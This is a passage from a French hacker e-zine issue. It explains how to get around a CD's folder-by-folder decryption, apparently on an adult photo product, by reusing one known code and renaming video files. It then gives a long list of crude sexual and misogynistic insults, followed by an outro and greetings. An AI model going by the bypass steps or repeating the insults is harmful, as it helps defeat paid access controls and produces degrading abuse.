forum de discussion vraiment cool ! (je vous refilerais l'URL !).

	Cette "astuce", consiste à décrypter un dossier dont nous aurons au préalable le code de 
décryptage (dossier: anal07   code: 1546445  CD n°5).

	Le code "1546445", décode le dossier : anal07 <= OK ?

	Dans ce dossier y a 5 images au format *.jpg cryptées <= OK ?
	
	Quand on rentre le code, le programme décrypte les 5 images et CES TOUT ! RIEN D'AUTRE !

	Alors pourquoi ne pas prendre le prog (viewer32), son *.sys (code.sys) et le mettre sur 
son disque dur pour pouvoir décrypter TOUTES les photos du cd ?

	ET OUAI CES CONS N'ONT MEME PAS PENSE A CELA !

	Il suffit de copier toutes les photos que l'on veut voir et de les mettres dans le dossier
"anal07", de cliquer 2 fois sur "viewer32" et d'entrer comme code "1546445" et voila, toutes 
les photos du cd sont visibles !

                                  C PAS COOl LA VIE ?

	
	Bon, j'entends déjà les mauvaises langues dires : ET POUR LES VIDEOS ?

	Encore plus simple, il suffit de trouver le dossier qui contiens une vingtaine de fichiers
sans extension (le dossier a souvent un nom bizarre et les fichier pèse souvent 20Mo !), de les 
copiers sur votre disque dur et de mettre (*.avi) a chaque extansion de ces fichiers !

	Ils sont vraiment cons ces programmeurs ;p




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
     *** PETITE LISTE D'INSULTES TRASH ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	Si vous voulez une petite liste d'insultes, pour les utiliser ou juste pour vous marrer,
alors lisez la suite !!! 
        

	* Giclette de sperme stérile !
	
	* Va lécher ta mère qui s'est fait sodomiser par un babouin !
	
	* Raclure de bidet ! Je vais te saigner la gueule sur la cuvette des chiottes !
	
	* Mange tes morts ! Pourriture infâme ! 
	
	* Sale Pute ! Pauvre Piche ! Sac à Bite ! Grosse Truie ! 
	
	* Face de gratoire à cul de tortue !!! 
	
	* Face de pec ! Je me demande encore si c'est ta vraie tête, ou si c'est ton cou qui 
	s'est mis à dégueuler...
 
	* Quadrisomique ! Pute borgne ! 
	
	* Je vais te bouffer la schkrom et te défoncer le boule tellement fort que ma teub te 
	sortira par la bouche.
 
	* Excrements de vache folle ! Sous-dérivé de fiente !!!!
 
	* J'te fend la pépite, sale cochone des marais qui suce les gnomes poilus des bois ! 

	* J'encule ta mère la chèvre ! Diarrhée verte ! 

	* Espèce de grosse truie mal baisée !!! 
	
	* Fumée de vagin ! 

	* Vieux fenec des steppes ravagée par la fiente de chameau !!!

	* Issu de branlette! Impuissant résidu d'escalier de bordel! 

	* Gueule de piniouf ! Verge pourrie ! Chiure de porc! Excrément de salamandre ! 

	* Par les fesse de ta mère tu es sorti, par la pine de ton père, tu seras éjecté! Vieille
	peau cramoisie ! Gros enculé !
 
	* Vieille cochonne ! Suceuse de troufions de morue ! 

	* Bouche à pipe! Je suis sûr que tu baises comme une salope !!! 
 
	* Sale grognasse, bouffe la merde au cul de ta mère ! 

	* Sale enculé de bourgeois capitaliste de merde ! 

	* Veille peau décrépie par le sperme chaud de porc ! 

	* Je t'éclaterais bien les veines du cul, grosse salope !!! 

	* Tu es la raclure qui nappe le fond des chiottes, par conséquent, je te chie dessus ! 

	* Tête de Caca ! Sale déjection de femelle ! Babouin en rute ! 

	* Va voir ta mère la guenon se faire prendre en levrette par le gros porc de la 
	basse-cours, espèce de chamelle des steppes !!!


	Et oui ! C'était con, ça volait pas haut, mais ça nous a bien fait marrer et en guise de
dernier article, on a trouvé ça excellent ;oP




			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                            O u t r o 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°




	Et voila ! La seconde comète de REVOLUTION s'achève ! J'espère que ça vous a plu encore
plus que le premier astéroïde et que je suis en train de devenir votre idole ;oP

	Je pense que la troisième comète de REVOLUTION fera un cratère sur le web vers le mois de
janvier, parce que je suis assez feignant, et même si la plupart de mes articles sont écrit 
depuis un bon bout de temps déja, ben c'est long de compiler tous les textes en faisant une 
jolie présentation, une intro et une outro. M'enfin, comme je vous aime, je peux le faire ;oP

	Enfin, je passe quelques greetz, juste pour montrer que moi aussi j'ai des potes trous du
cul et que vous nous faites pas peur parce qu'on est des W4rL0rDzZ :

		- Angelz, pour son amitié, ses conseils, nos délires et ses articles
		- ACiD BuRN, un exemple de compétence et d'humilité
		- Chaos-Confusion-Savon, pour sa bonne humeur constante
		- H117, juste parce que c'est lui
		- AhFeelGood, un jeune jedi qui m'étonnera toujours
		- Monoprix, parce qu'on y trouve des bonnes bières ;o)

	
	Allez, c'est le moment de se quitter...

	RENDEZ-VOUS DANS LA TROISIEME COMETE DE REVOLUTION !!!



      
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°



		#######     #######   ######      ######    #      #   #      #
		#      #   #          #     #    #      #    #    #     #    #
		#      #   #          #      #   #      #     #  #       #  #
		#######     ###       #      #   #      #      ##         ##
		#    #     #          #      #   #      #     #  #       #  #
		#     #    #          #     #    #      #    #    #     #    #
		#      #    #######   ######      ######    #      #   #      #



      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*° 





 

